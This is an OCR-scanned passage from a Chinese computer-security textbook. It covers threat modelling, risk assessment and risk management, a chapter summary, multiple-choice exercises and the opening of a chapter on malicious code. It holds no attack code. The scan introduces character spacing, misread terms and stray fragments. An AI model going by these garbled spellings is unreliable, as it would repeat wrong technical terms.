入 口 点 。 安 全 人 员 有 必要 了 解 各 种 入 口 点 ,并 掌握 如 何 绕 过 合法 入 口 实施 攻击 。 每 个 入口 
点 应 该 具有 一 定 类 型 的 监管 机 制 ,提供 授权 和 某 种 程度 的 有 效 性 验证 。 逻 辑 入 口 点 通常 包 
括 网 页 提供 的 界面 、WebServices 提供 的 服务 接口 ` 面 向 服务 的 组 件 、. 远 程 组 件 、 消 息 队 列 。 
物理 入 口 点 或 者 平台 入 口 点 主要 是 Sockets 和 端口 。 
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识别 权限 代码 (Identify Privileged Code) 发 现 可 以 访问 特殊 安全 资源 ,执行 其 他 权限 操 
作 的 代码 。 常 见 的 安全 资源 包括 DNS 服务 器 ,名录 服务 .环境 变量 .事件 日 志文 件 系 统 、 消 
息 队 列 , 性 能 计数 器 ,打印 机 ,注册 表 、Sockets 和 Web Services。 常 见 的 安全 操作 包括 不 受 
管理 的 代码 调用 、 反 射 序 列 化 改变 代码 访问 控制 许可 、 操 纵 代码 访问 安全 策略 、 取 证 。 

识别 威胁 (Identify the Threats) 是 站 在 攻击 者 的 角度 ,针对 应 用 系统 体系 结构 特点 和 
潜在 漏洞 标识 出 可 以 影响 应 用 系统 的 威胁 。 识 别 技术 将 抽象 的 威胁 映射 为 与 技术 细节 相关 
的 威胁 ,有 助 于 形成 正确 和 最 适合 的 缓解 方案 。 

识别 威胁 首先 要 识别 已 存在 预防 措施 的 访问 点 ,以 及 其 他 可 能 进入 该 系统 的 访问 点 。 
确定 每 个 访问 点 的 可 能 威胁 或 通常 威胁 ,并 检查 通过 每 个 访问 点 的 可 能 的 目标 (机 密 性 、 完 
整 性 .可 用 性 .可 审 性 )。 基 于 访问 点 的 危险 程度 给 每 个 风险 分 成 高 .中 、 低 等 级 。 必 须 指 出 ， 
对 于 相同 的 漏洞 可 能 得 出 基于 访问 点 的 不 同 级 别 的 风险 。 

1995 年 ,D. B. Parker 总 结 了 各 个 安全 特性 可 能 面临 的 具体 威胁 ,并 描述 了 6 个 常见 损 
失 场 景 (LOSS Scenario) : 可 用 性 与 实用 性 的 主要 威胁 包括 破坏 (Destroy) ,损害 (Damage) 、 
污染 (contaminate) ,否认 (Deny) ,拖延 (Prolong) .迟滞 (Delay) ;完整 性 和 鉴别 性 的 主要 威 
胁 是 进入 /使 用 /产生 错误 数据 (Enter/Use/Produce False Data)、 修 改 (Modify)、 蔡 换 
(Replace) , 重 排序 (Reorder) 、 算 改 (Misrepresent) ,拒绝 (Repudiate or Reject as Untrue)、 
滥用 (Misuse or Failed to Use as Required) ;机 密 性 和 占有 性 的 主要 威胁 是 访问 (Access)、 
泄露 (Disclose) 、 监 控 (observe or Monitor) ,拷贝 (Copy) 、 盗 窃 (Steal)。 任 何 处 于 上 述 威胁 
的 状态 均 称 为 暴露 威胁 (Exposure to Threats)。 

从 信息 安全 属性 来 看 ,攻击 类 型 可 分 为 阻 断 攻击 、 截 取 攻 击 、 自 改 攻击 和 伪造 攻击 。 洪 
在 的 攻击 可 来 自任 何 能 访问 系统 的 源 ,这 些 潜 在 攻击 源 之 间 有 很 大 差异 , 它 依赖 于 一 个 组 织 
的 规模 以 及 提供 的 访问 类 型 。 要 能 识别 所 有 可 能 的 攻击 源 、 攻 击 的 介质 或 漏洞 途径 和 可 获 
得 最 大 利益 。 攻 击 源 来 自 多 方面 ,包括 内 部 系统 、 来 自 办 公 室 的 访问 、 通 过 广域网 联 到 经 营 
伙伴 的 访问 .通过 Internet 的 访问 ,以 及 通过 modem 池 的 访问 等 。 可 能 是 组 织 内 部 的 员工 、 
临时 员工 和 顾问 ` 竞 争 者 .与 组 织 持 不 同 观点 和 目的 的 人 、 反 对 这 个 组 织 或 其 员工 的 人 等 。 

识别 所 有 的 目标 威胁 是 非常 费时 和 困难 的 。 可 以 变更 一 种 方法 , 即 假设 存在 一 个 通常 
威胁 ,这 个 威胁 可 能 包括 任何 可 能 访问 组 织 信息 或 系统 的 人 (员工 、 客 户 、 供 应 商 等 ,其 中 某 
些 人 可 能 具有 访问 权限 、 知 识 动机 做 某 些 坏事 )。 通 常 威胁 能 检查 组 织 内 允许 这 些 访问 发 
生 可 能 产生 的 漏洞 ,将 任何 这 样 的 漏洞 计 入 风险 。 

识别 威胁 由 开发 人 员 和 测试 人 员 共同 通过 头脑 风暴 方式 实施 ,为 了 确保 识别 过 程 有 效 ， 
威胁 识别 过 程 需要 系统 结构 师 、 安 全 专家 、 开 发 人 员 ,测试 人 员 、 系 统管 理 员 协作 完成 。 识 别 
威胁 方法 很 多 ,包括 STRIDE 方式 和 威胁 门类 清单 。 识 别 目标 可 以 分 为 网 络 、 宿 主 环境 和 
应 用 系统 。 

安全 剖面 文档 化 是 通过 某 种 形式 文档 说 明 如 何 解决 系统 面临 的 各 种 威胁 ,包括 有 效 性 
威胁 ,认证 威胁 .授权 威胁, 配置 管理 威胁 .敏感 数据 威胁 、 会 话 管理 威胁 ,加密 威胁 .参数 操 
纵 威胁 .异常 管理 威胁 .审计 和 日 志 威 胁 。 威 胁 文档 化 一 般 包括 威 胁 描述 ` 威 胁 目 标 以 及 其 
他 可 选 属性 如 攻击 技术 、 对 策 等 。 

评价 威胁 是 威胁 建 模 的 最 后 一 个 步骤 ,安全 人 员 根 据 特殊 场景 的 威胁 清单 评估 它们 各 
自 可 能 导致 的 风险 。 通 常 先 评估 最 大 的 风险 威胁 ,然后 解析 其 他 威胁 风险 。 威 胁 评估 是 十 
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分 具体 的 ,有 时 也 是 很 困难 的 ,在 很 大 程度 上 带 有 主观 性 。 在 试图 识别 一 个 组 织 或 目标 的 威 
胁 时 ,经 常会 转 到 那些 竞争 对 手 的 身上 。 然 而 ,真正 的 威胁 往往 是 非常 隐藏 的 ,在 攻击 事件 
发 生 以 前 ,真正 的 目标 威胁 往往 并 不 暴露 出 来 。 

威胁 分 析 的 结果 一 般 包括 按 风险 排序 的 系统 威胁 列表 、 按 经 济 损害 排序 的 系统 威胁 列 
表 、 按 总 体 风险 缓解 效果 排序 的 对 策 列表 、 按 代价 绩效 排序 的 对 策 列表 、 现 有 威胁 对 每 个 资 
产 引 起 的 最 大 风险 、 现 有 威胁 对 每 个 资产 引起 的 最 小 风险 、 现 有 威胁 对 每 个 资产 引起 的 当前 
风险 、 所 有 资产 的 最 大 风险 、 所 有 资产 的 最 小 风险 、 所 有 资产 的 当前 风险 等 。 

4. 风险 评估 

风险 评估 (Risk Assessment) 是 对 信息 和 信息 处 理 设施 的 威胁 .影响 (直接 和 间接 损失 ) 
和 脆弱 性 及 三 者 发 生 的 可 能 性 的 评估 。 风 险 评估 分 为 基本 风险 评估 、 详 细 风 险 评 估 和 联合 
风险 评估 三 类 。 

基本 风险 评估 又 称 为 基线 风险 评估 (Baseline Risk Asse-ssment) ,是 指 应 用 直接 和 简易 
的 方法 达到 基本 的 安全 水 平一 一 安全 基线 ,就 能 满足 组 织 及 其 业务 环境 的 所 有 要 求 。 安 全 
基线 是 在 诸多 标准 规范 中 规定 的 一 组 安全 控制 措施 或 者 惯例 ,这 些 措 施 和 惯例 适用 于 特定 
环境 下 的 所 有 系统 ,可 以 满足 基本 的 安全 需求 ,能 使 系统 达到 一 定 的 安全 防护 水 平 。 可 选择 
安全 基线 有 : 国际 标准 和 国家 标准 ,如 BS 7799-1 ,ISO 13335-4; 行 业 标准 或 推荐 ,如 德国 联 
邦 安全 局 IT 基线 保护 手册 ;来 自 其 他 有 类 似 业务 目标 和 规模 的 组 织 的 惯例 。 

基本 风险 评估 的 优点 是 所 需 资源 最 少 ,简便 易 实施 ;同样 或 类 似 的 控制 能 被 许多 信息 安 
全 管理 体系 所 采用 ,不 需要 耗费 很 大 的 精力 。 缺 点 是 安全 基线 水 平 难以 设置 ,管理 与 安全 相 
关 的 变更 可 能 有 困难 。 

详细 风险 评估 就 是 对 资产 威胁 及 脆弱 性 进行 详细 的 识别 和 评估 。 有 具体 程序 是 对 资产 、 
威胁 和 脆弱 性 进行 测量 与 赋值 ;使 用 适当 的 风险 测量 方法 完成 风险 计算 和 测量 。 其 优点 是 
可 以 更 精确 地 认识 安全 风险 ,识别 组 织 的 安全 要 求 和 水 平 ,获得 更 详细 或 额外 的 信息 使 安全 
管理 受益 。 缺 点 是 需要 花费 相当 的 时 间 、 精 力 和 技术 去 获得 可 行 的 结果 。 

联合 风险 评估 首先 使 用 基本 风险 评估 ,识别 具有 潜在 高 风险 或 对 业务 运作 来 说 极为 关 
键 的 资产 ,然后 根据 基本 风险 评估 的 结果 将 信息 安全 管理 体系 范围 内 的 资产 分 成 高 风险 资 
产 和 一 般 资 产 两 类 来 处 理 。 优 点 是 既 节省 评估 所 花费 的 时 间 与 精力 ,又 能 确保 获得 一 个 全 
面 系统 的 评估 结果 ;组 织 的 资源 与 资金 能 够 被 应 用 在 最 能 发 挥 作 用 的 地 方 ,具有 高 风险 的 信 
息 系统 能 够 被 预先 关注 。 

风险 评估 的 基本 步骤 包括 识别 漏洞 .假想 威胁 场景 .估算 威胁 概率 和 风险 、 对 策 排序 、. 准 
备 标签 列表 、 标 识 系统 资产 、 资 产 排序 ,资产 价值 动态 调整 ,标识 系统 真实 漏洞 .分 类 潜在 攻 
击 类 型 标识 潜在 入 口 点 ,构造 威胁 场景 及 其 缓解 计划 ,检验 反思 分 析 结 果 。 构 造 威胁 场景 
及 其 缓解 计划 又 可 以 分 解 为 威胁 初始 化 、 标 定 受 损 资 产 及 损害 等 级 设置 威胁 概率 、 标 识 已 
用 漏洞 构造 威胁 缓解 计划 ,标识 相关 攻击 类 型 .声明 标签 ,标识 相对 入 口 点 。 基 本 风险 评估 
的 步骤 如 图 1. 15 所 示 。 

(1) 资产 识别 和 估价 。 列 出 所 有 信息 资产 ,进行 资产 估价 ,包括 账面 价格 和 相对 价值 
(对 业务 绩效 的 影响 、 对 组 织 声誉 和 形象 的 影响 、 对 业务 保密 性 的 影响 、 业 务 活动 中 断 造成 的 
影响 、 对 环境 安全 及 公共 秩序 的 破坏 .资金 损失 .对 个 人 信息 及 安全 的 影响 等 ) 。 资 产 定 性 分 
级 ,一 般 分 为 低 、 中 、 高 三 级 。 
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图 1.15 风险 评估 过 程 与 步骤 


(2) 威胁 评估 。 识 别 产 生 威胁 的 来 源 和 途径 ,确认 威胁 的 目标 ,评估 威胁 发 生 的 可 能 
性 。 威 胁 源 可 能 是 蓄意 也 可 能 是 偶然 的 因素 ,通常 包括 人 、 系 统 、. 自 然 环 境 等 。 威 胁 类 型 包 
括 非 授权 访问 . 算 改 ,拒绝 服务 .否认 等 。 影 响 威胁 发 生 的 因素 包括 资产 的 吸引 力 ,资产 转化 
成 报酬 的 容易 程度 ,威胁 的 技术 含量 .脆弱 性 被 利用 的 难 易 程度 等 。 

(3) 脆弱 性 评估 。 评 估 技 术 操作 ,管理 上 的 脆弱 性 。 

(4) 确认 现 有 安全 控制 。 确 认 系统 现 有 的 安全 控制 ,如 威慑 性 (Deterrent)、 预 防 性 
(Preventive) ,检测 性 (Detective) 纠正 性 (Corrective) 等 安全 控制 ,来 防止 威胁 、 保 护 脆弱 
性 ,发 现 安全 事件 降低 风险 。 

(5) 风险 评价 。 识 别 组 织 所 面临 的 安全 风险 并 确定 风险 控制 的 优先 等 级 。 通 过 风险 识 
别 , 可 以 知道 一 些 特殊 类 型 的 资产 价值 以 及 包含 这 些 信息 的 系统 的 价值 。 将 风险 分 成 高 、 
中 、 低 三 个 级 别 , 对 应 漏洞 暴露 的 危害 是 否 是 持续 的 ,减少 风险 需要 花费 的 资源 多 少 。 风 险 
测量 必须 识别 出 该 组 织 在 受到 攻击 后 需要 付出 的 代价 。 

(6) 选择 实施 安全 控制 措施 .降低 风险 。 对 风险 实施 有 效 的 安全 控制 ,将 风险 控制 在 组 
织 可 以 接受 的 范围 之 内 。 采 取 相 应 的 对 策 和 预防 措施 ,包括 防火 墙 、. 防 病毒 软件 .访问 控制 、 
双 因 子 身份 鉴别 系统 、 仿 生 网 络 安 全 程序 、 用 于 访问 设备 的 读 卡 器 文件 访问 控制 ,对 员工 进 
行 安全 培训 等 。 

(7) 风险 接受 。 进 行 风险 管理 。 

残余 风险 (Residual Risk) 是 指 采 取 了 安全 措施 提高 信息 安全 保障 能 力 后 ,仍然 可 能 存 
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在 的 风险 。 残 余 风险 的 提出 表示 风险 不 可 能 完全 消除 ,风险 也 不 必要 完全 消除 ,残余 风险 应 
受到 密切 监视 ,因为 它 可 能 会 在 将 来 诱发 新 的 事件 。 

在 识别 信息 资源 以 及 潜在 的 攻击 源 后 ,可 评估 该 组 织 系统 受 攻击 的 潜在 风险 级 别 。 例 
如 ,一 个 内 部 系统 在 它 的 邮件 系统 内 有 一 个 漏洞 ,对 外 部 来 说 通过 防火 墙 才能 由 访问 点 访问 
系统 ,没有 风险 。 然 而 内 部 员工 可 通过 漏洞 访问 系统 ,应 将 它 列 为 中 等 风险 级 别 。 如 果 物 理 
安全 控制 很 弱 ,任何 非 授 权 者 可 随意 进出 并 操作 该 系统 , 则 防火 墙 预防 措施 这 时 失效 ,这 种 
情况 应 列 为 高 风险 级 别 。 

5. 风险 管理 

风险 管理 是 通过 风险 识别 ,评估 风险 以 及 制定 策略 采取 适当 的 控制 方式 使 风险 被 避免 、 
转移 或 降 至 一 个 可 接受 的 水 平 。 风 险 识 别 是 指 为 了 使 计算 机 系统 能 安全 地 运行 ,分 析 影 响 
计算 机 系统 安全 运行 的 诸多 因素 和 存在 的 风险 的 过 程 。 

从 本 质 上 讲 , 安 全 就 是 风险 管理 。 一 个 组 织 者 如 果 不 了 解 其 信息 资产 的 安全 风险 ,很 多 
资源 就 会 被 错误 地 使 用 。 风 险 使 组 织 系统 付出 的 安全 代价 是 确定 如 何 管理 风险 的 决定 因 
素 , 风 险 管理 反 过 来 也 提供 信息 资产 评估 的 基础 。 

安全 代价 是 多 方面 的 ,包括 资金 (损失 的 生产 能 力 ,设备 系统 恢复 的 费用 ) 时间 ( 系 统 恢 
复 所 需 时 间 ) ,资源 (系统 恢复 所 需 资源 ) 信誉 以 及 丢失 生意 等 。 系 统 绝对 安全 的 代价 是 产 
生 宛 余 的 安全 措施 、 低 效 的 安全 投资 .紧张 的 安全 管理 人 员 、 对 员工 的 不 信任 感 。 

但 风险 永远 不 可 能 完全 去 除 ,风险 必须 管理 。 因 此 系统 只 能 是 适度 安全 的 ,在 安全 强度 
与 安全 代价 之 间 ,安全 与 开放 之 间 寻 求 平衡 点 。 安 全 是 相对 的 ,风险 是 绝对 的 。 系 统 安全 最 
终 是 一 个 折 中 的 方案 ,需要 对 危害 和 降低 危害 的 代价 进行 权衡 。 

考虑 系统 的 现 有 环境 ,以 及 近期 和 远 期 系统 发 展 变化 的 趋势 。 选 用 先进 的 安全 体系 结 
构 和 系统 安全 平台 可 减少 安全 操作 代价 ,获得 良好 的 安全 强度 ,以 小 的 安全 代价 换取 高 的 安 
全 强度 。 除 此 之 外 ,需要 考虑 以 下 因素 : 

(1) 用 户 的 方便 程度 。 不 应 由 于 增加 安全 强度 给 用 户 带 来 很 多 麻烦 。 

(2) 管理 的 复杂 性 。 对 增加 安全 强度 的 系统 要 易于 配置 ,管理 。 

(3) 对 现 有 系统 的 影响 。 包 括 增加 的 性 能 开销 以 及 对 原 有 环境 的 改变 等 。 

(4) 对 不 同 平台 的 支持 。 安 全 系统 应 能 适应 不 同 平台 的 异 构 环境 的 使 用 。 

如 果 由 于 入 侵 手 段 增强 而 引起 新 的 变化 , 则 产生 新 的 平衡 点 , 即 安全 强度 和 安全 代价 的 
折 中 选择 。 

以 风险 评估 为 安全 建设 的 出 发 点 ,改变 了 传统 的 以 技术 驱动 为 导向 的 安全 体系 结构 设 
计 及 详细 安全 方案 制定 ,采取 了 成 本 一 效益 平衡 的 原则 。 风 险 管理 的 最 终 目 标 是 制定 一 个 
有 效 的 ,节省 的 计划 来 看 管 资产 。 通 过 风险 评估 来 识别 风险 大 小 ,制定 信息 安全 方针 、 采 取 
适当 的 控制 目标 与 控制 方式 对 风险 进行 控制 ,使 风险 被 避免 .转移 或 降 至 一 个 可 被 接受 的 
水 平 。 


1.4.6 全 书 内 容 安排 


全 书 首先 从 信息 化 与 信息 系统 存在 的 安全 威胁 出 发 ,介绍 信息 安全 的 基本 概念 .体系 结 
构 和 安全 模型 ,阐述 计算 机 系统 安全 的 概念 .内容 和 技术 目标 ,安全 标准 与 等 级 划分 ,安全 风 
险 评 估 等 。 恶 意 代 码 是 安全 威胁 的 直接 来 源 ,也 是 黑客 攻击 的 工具 ,为 提高 读者 兴趣 安排 在 
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第 2 章 , 安 全 人 员 必 须 掌 握 其 原理 和 特点 。 第 3 章 是 作为 系统 安全 核心 的 密码 学 基础 理论 。 
第 4 章 是 认证 技术 ,从 杂凑 函数 和 数字 签名 入 手 介 绍 消息 认证 和 身份 认证 技术 。 第 5 章 访 
问 控制 理论 和 技术 是 实现 系统 安全 的 关键 。 第 6 章 介绍 操作 系统 安全 ,阐述 安全 操作 系统 
机 制 和 操作 系统 安全 的 技术 。 第 7 章 介绍 软件 保护 技术 .逆向 技术 和 数字 版 权 管理 .第 8 章 
介绍 黑客 攻击 和 防范 原理 与 技术 。 第 9 章 介 绍 数据 库 安 全 ,包括 数据 库 管理 系统 安全 机 制 、 
数据 库 数据 安全 技术 和 数据 库 应 用 系统 安全 技术 。 第 10 章 介绍 防火 墙 技术 ,是 系统 安全 和 
网 络 安全 的 重要 基础 。 第 11 章 介 绍 人 侵 检测 与 防御 技术 。 第 12 章 介 绍 数字 取证 技术 。 

学 习 计 算 机 系统 安全 ,密码 学 是 理论 基础 ,恶意 代码 和 黑客 是 重要 的 威胁 源 , 必 须 掌握 
其 原理 和 技术 ,操作 系统 安全 ,数据 库 安 全 软件 保护 和 数字 版 权 管理 是 核心 ,访问 控制 、 防 
火 墙 ,人 侵 检 测 与 防御 以 及 数字 取证 是 实现 计算 机 系统 安全 的 重要 技术 和 保障 。 


本 章 小 结 


计算 机 信息 系统 是 由 计算 机 及 其 相关 的 和 配套 的 设备 ( 含 网 络 ) 构 成 的 ,并 按 一 定 的 应 
用 目标 和 规则 对 信息 进行 采集 ,加工 .存储 传输、 检索 等 处 理 的 人 机 系统 。 

信息 安全 是 指 对 信息 的 机 密 性 、 完 整 性 和 可 用 性 的 保持 。 另 外 还 可 以 加 上 可 控 性 和 不 
可 否认 性 。 

安全 威胁 是 指 对 安全 的 一 种 潜在 的 侵害 。 威 胁 的 实施 称 为 攻击 。 一 般 认为 ,目前 计算 
机 系统 安全 面临 的 威胁 主要 有 3 种 : 信息 泄露 .拒绝 服务 和 系统 破坏 。 

对 信息 的 攻击 模式 为 中 断 、 截 取 / 窃 听 、 算 改 和 捏造 4 种。 攻击 类 型 从 安全 属性 的 观点 
分 为 阻 断 攻 击 ,截取 攻击 、 算 改 攻击 和 伪造 攻击 4 类 ,从 攻击 方式 分 为 被 动 攻 击 和 主动 攻击 
两 类 ,从 攻击 目的 和 效果 分 为 访问 攻击 , 算 改 攻击 、 拒 绝 服 务 和 否认 攻击 。 

计算 机 系统 是 指 信息 系统 依赖 于 计算 机 存在 的 实体 与 环境 系统 ,是 硬件 .软件 和 信息 资 
源 的 有 机 组 合 。 

计算 机 系统 安全 是 指 为 计算 机 系统 建立 和 采取 的 技术 与 管理 的 安全 保护 措施 ,用 以 保 
护 计算 机 系统 中 的 硬件 ,软件 以 及 数据 ,防止 因 偶然 或 恶意 的 原因 而 使 系统 或 信息 章 到 破 
坏 、 更 改 或 泄露 。 包 括 物 理 安全 、 运 行 安全 以 及 信息 安全 三 个 方面 。 

安全 体系 结构 是 提供 未 定义 环境 的 概念 上 的 安全 定义 和 结构 ,包括 OSI 安全 体系 结 
构 、Internet 安全 体系 结构 和 基于 TCP/IP 的 网 络 安全 体系 结构 。 

信息 安全 模型 主要 有 P2DR 模型 . 安 氏 的 PADIMEE™ 模 型 、Bell-LaPadula 保密 性 模 
型 .Clark-Wilson 模型 和 China Wall 模型 等 。 

安全 策略 是 指 在 一 个 特定 的 环境 里 (安全 区 域 ) ,为 了 保证 提供 一 定 级 别 的 安全 保护 所 
必须 遵守 的 一 系列 条 例 和 规则 。 一 般 可 分 为 基于 规则 的 策略 、 基 于 身份 的 策略 和 基于 角色 
的 策略 三 种 。 

可 信 计 算 机 系统 评估 准则 TCSEC 将 计算 机 系统 的 安全 划分 为 4 个 等 级 .7 个 安全 级 别 
(从 低 到 高 依次 为 D.C1、.C2、B1、B2、B3 和 和 A 级 )。 信 息 系统 的 安全 性 从 低 到 高 划分 为 5 个 
等 级 ,分 别 是 用 户 自 主 保护 级 .系统 审计 保护 级 、 安 全 标记 保护 级 、 结 构 化 保护 级 和 访问 验证 
保护 级 。 

风险 是 丢失 需要 保护 的 资产 的 可 能 性 。 威 胁 是 可 能 破坏 信息 系统 环境 安全 的 行动 或 事 
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件 , 包 含 目标 .代理 和 事件 三 个 组 成 部 分 。 漏 洞 是 攻击 的 可 能 的 途径 。 风 险 是 威胁 和 漏洞 的 
综合 结果 。 没 有 漏洞 的 威胁 没有 风险 ,没有 威胁 的 漏洞 也 没有 风险 。 

风险 分 析 是 对 需要 保护 的 资产 及 其 受到 的 潜在 威胁 的 鉴别 过 程 。 风 险 分 析 始 于 对 需要 
保护 的 资产 (物理 资源 .知识 资源 .时 间 资 源 、 信 誉 资源 ) 的 鉴别 以 及 对 资产 威胁 的 潜在 攻击 
源 的 分 析 。 正 确 的 风险 分 析 是 保证 计算 机 系统 安全 的 极其 重要 的 一 步 。 

识别 威胁 (Identify the Threats) 是 站 在 攻击 者 的 角度 ,针对 应 用 系统 体系 结构 特点 和 
潜在 漏洞 标识 出 可 以 影响 应 用 系统 的 威胁 。 识 别 技术 将 抽象 的 威胁 映射 为 与 技术 细节 相关 
的 威胁 ,有 助 于 形成 正确 和 最 适合 的 缓解 方案 。 

风险 测量 是 确定 由 于 攻击 引起 的 代价 ,包括 资金 .时 间 、 资 源 和 信誉 。 风 险 评 估 分 为 基 
本 风险 评估 .详细 风险 评估 和 联合 风险 评估 3 类 。 风 险 永远 不 可 能 完全 去 除 ,风险 必须 
管理 。 

学 习 计 算 机 系统 安全 ,密码 学 是 理论 基础 ,恶意 代码 和 黑客 是 重要 的 威胁 源 ,必须 掌握 
其 原理 和 技术 ,操作 系统 安全 、 数 据 库 安全 、 软 件 保 护 和 数字 版 权 管理 是 核心 ,访问 控制 、 防 
火 墙 ,人 侵 检测 与 防御 以 及 数字 取证 是 实现 计算 机 系统 安全 的 重要 技术 。 


习题 1 


什么 是 信息 系统 ? 什么 是 计算 机 系统 安全 ? 
简 述 OSI 安全 体系 结构 。 
结合 计算 机 信息 系统 面临 的 威胁 , 谈 谈 信息 系统 安全 的 发 展 。 
对 攻击 可 能 性 的 分 析 在 很 大 程度 上 带 有 (  ” )。 
A. 客观 性 B. 主观 性 ;. 盲目 性 D. 前 面 3 项 都 不 是 
1.5 从 安全 属性 对 各 种 攻击 进行 分 类 , 阻 断 攻 击 是 针对 ( ) 的 攻击 ;截获 攻击 是 针对 
(  ) 的 攻击 。 
A. 机 密 性 B. 可 用 性 C. 完整 性 D. 真实 性 
1.6 从 攻击 方式 区 分 攻击 类 型 ,可 分 为 被 动 攻击 和 主动 攻击 ,被 动 攻击 难以 ( ) ,然而 
(  ) 这 些 攻击 是 可 行 的 ;主动 攻击 难以 (  ) ,然而 ( ””) 这 些 攻击 是 可 行 的 。 
A. 阻止 ,检测 ,阻止 ,检测 B. 检测 ,阻止 ,检测 ,阻止 
C. 检测 ,阻止 ,阻止 ,检测 D. 前 面 3 项 都 不 是 
1.7 窃听 是 一 种 (  ) 攻 击 , 攻 击 者 ( ”) 将 自己 的 系统 插入 到 发 送 站 和 接收 站 之 间 。 截 
获 是 一 种 (  ) 攻 击 ,攻击 者 (  “) 将 自己 的 系统 插入 到 发 送 站 和 接收 站 之 间 。 


Hd ld 
和 


A. 被动 ,无 须 ,主动 ,必须 B. 主动 ,必须 ,被 动 ,无 须 

C. 主动 ,无 须 ,被 动 ,必须 D. 被 动 ,必须 ,主动 ,无 须 
1.8 威胁 是 一 个 可 能 破坏 信息 系统 环境 安全 的 动作 或 事件 ,威胁 包括 ( 。”)。 

A. 目标 B. 代理 C. 事件 D. 前 面 3 项 都 是 
1.9 对 目标 的 攻击 威胁 通常 通过 代理 实现 ,而 代理 需要 的 特性 包括 (  )。 

A. 访问 目标 的 能 力 B. 对 目标 发 出 威胁 的 动机 


C. 有 关 目 标的 知识 D. 前 面 3 项 都 是 
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1.10 拒绝 服务 攻击 的 后 果 是 (  )。 


A. 信息 不 可 用 B. 应 用 程序 不 可 用 C. 系统 宕 机 
D. 阻止 通信 E. 前 面 几 项 都 是 

1.11 风险 是 丢失 需要 保护 的 ( 。””) 的 可 能 性 ,风险 是 ( 。”) 和 ( ”) 的 综合 结果 。 
A. 资产 ,攻击 目标 ,威胁 事件 B. 设备 ,威胁 ,漏洞 


C. 资产 ,威胁 ,漏洞 D. 前 面 3 项 都 不 对 


第 2 章 恶意 代码 
2.1 恶意 代码 概述 


1. 恶意 代码 的 概念 

恶意 代码 是 一 种 程序 代码 , 它 通过 把 代码 在 不 被 察觉 的 情况 下 锐 嵌 到 另 一 个 正常 程序 
或 系统 中 隐藏 执行 ,从 而 达到 破坏 计算 机 系统 数据 的 安全 性 和 完整 性 .安装 或 运行 具有 人 侵 
性 或 破坏 性 的 程序 恶意 占用 和 消耗 计算 机 系统 资源 的 目的 。 把 未 经 授权 便 干扰 或 破坏 计 
算 机 系统 的 安全 性 和 完整 性 的 程序 或 代码 (一 组 指令 ) 称 为 恶意 程序 ,也 称 为 恶意 软件 
(Malicious Software,Malware) ,其 中 的 一 组 指令 可 能 是 二 进 制 文件 ,也 可 能 是 脚本 语言 引 
是 宏 语言 等 。 

恶意 程序 也 基于 冯 ，。 诺 依 曼 体系 结构 ,包括 混合 的 数据 和 指令 、 系 统 各 种 信息 的 入 口 
点 ,可 能 有 着 交互 且 动 态 的 内 容 和 各 种 扩展 功能 。 恶 意 代 码 一 般 存 在 于 系统 的 引导 程序 操 
作 系 统 程 序 与 库 文件 、 操 作 系 统 内 核 , 基 本 输入 输出 系统 BIOS, 带 微 代码 的 CPU 等 中 间 。 

恶意 代码 的 危害 主要 包括 : 攻击 系统 ,造成 系统 瘫痪 或 操作 异常 ;危害 数据 文件 的 安全 
存储 和 使 用 ;泄露 文件 .配置 或 隐私 信息 ;肆意 占用 资源 ,影响 系统 或 网 络 的 性 能 ;攻击 应 用 
程序 ,如 影响 邮件 的 收发 ;诱骗 访问 恶意 网 站 等 。 

2. 恶意 代码 的 分 类 与 命名 

恶意 代码 与 正常 代码 并 没有 什么 区 别 , 但 恶意 代码 执行 状态 和 行为 对 计算 机 系统 构成 
危害 ,可 以 从 程序 代码 的 结构 特征 (静态 ) 和 行为 特性 (动态 ) 来 区 分 。 

按 传播 方式 ,恶意 代码 大 致 可 以 分 成 病毒 .木马 .蠕虫 和 恶意 移动 代码 4 类 。 按 存在 方 
式 分 为 依赖 于 主机 的 程序 (如 木马 ,病毒 ) 和 独立 于 主机 的 程序 (如 蠕虫 和 恶意 移动 代码 ) 。 

反 病 毒 公司 为 了 方便 管理 ,会 按照 恶意 软件 的 特性 对 恶意 软件 (广义 病毒 ) 进 行 分 类 命 
名 。 虽 然 各 反 病 毒 公司 的 命名 规则 不 一 样 , 但 它们 的 命名 方法 大 体 统 一 。 命 名 的 一 般 格 式 
为 < 前 级 二. 所 名 称 >. 过后 缀 二 ,其 中 前 级 按 恶 意 代码 种 类 分 ,如 Trojan、Worm; 名 称 按 
恶意 代码 家 族 特 征 分 ,如 CIH ;后 级 是 指 一 个 恶意 代码 的 变种 特征 ,如 a\b。 

例如 某 公司 的 前 级 命名 : 系统 病毒 为 Win32、PE、Win95 等 ;蠕虫 为 Worm; 木 马 为 
Trojan; 脚 本 病毒 为 Script、VBS、Js 等 ; 宏 病 毒 为 Macro; 后 门 为 Backdoor; 破坏 性 程序 为 
Harm; 玩 笑 程 序 为 Joke; 捆绑 机 病毒 为 Binder; 拒 绝 服务 攻击 程序 为 DoS; 漏 洞 溢出 工具 为 
Exploit。 

3. 恶意 程序 的 产生 原因 

人 类 世界 存在 霸权 主义 . 恺 怖 主义 ,和 平 的 表面 下 暗流 涌 动 。 信 息 世 界 也 存在 着 各 种 黑 
客 组 织 ,为 利益 而 勒索 、 发 动 信息 战 。 恶意 用 户 符合 2/8 原则 ,20% 的 计算 机 用 户 想 挑战 自 
己 的 智慧 、 获 得 财富 ,利用 各 种 弱 口 令 或 配置 ,缓冲 区 溢出 、SQL 注入 等 技术 进行 恶意 操作 。 
缺乏 安全 知识 的 用 户 群 大 都 不 了 解 计算 机 的 复杂 性 和 软件 的 风险 。 多 数 用 户 具 有 同 构 计算 
环境 ,如 操作 系统 同 构 (Windows、Linux/UNIX)、 应 用 程序 同 构 (html/xml/java/pdf/doc/ 
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db) 和 网 络 协 议 同 构 (TCP/IP) 等 。 互联网、 无 线 网 .各 种 生产 生活 与 商业 应 用 ,使 得 信息 有 
着 空前 的 连通 性 , 且 连 接 速 度 越 来 越 快 ,带宽 越 来 越 大 ,信息 孤岛 日 益 减 少 , 信 息 的 共享 性 和 
人 们 对 它 的 依赖 性 给 恶意 用 户 提供 了 机 会 。 


2.2 计算 机 病毒 


计算 机 病毒 是 指 谋 入 在 计算 机 程序 或 文件 中 的 具有 破坏 计算 机 功能 或 者 毁坏 数据 、 影 
响 计 算 机 使 用 、 并 能 自我 复制 传播 的 一 组 计算 机 指令 或 者 程序 代码 。 它 是 一 组 能 够 进行 自 
我 传播 .需要 用 户 干预 来 触发 执行 的 破坏 性 程序 或 代码 ,或 是 一 类 能 够 寻找 宿主 并 且 依附 于 
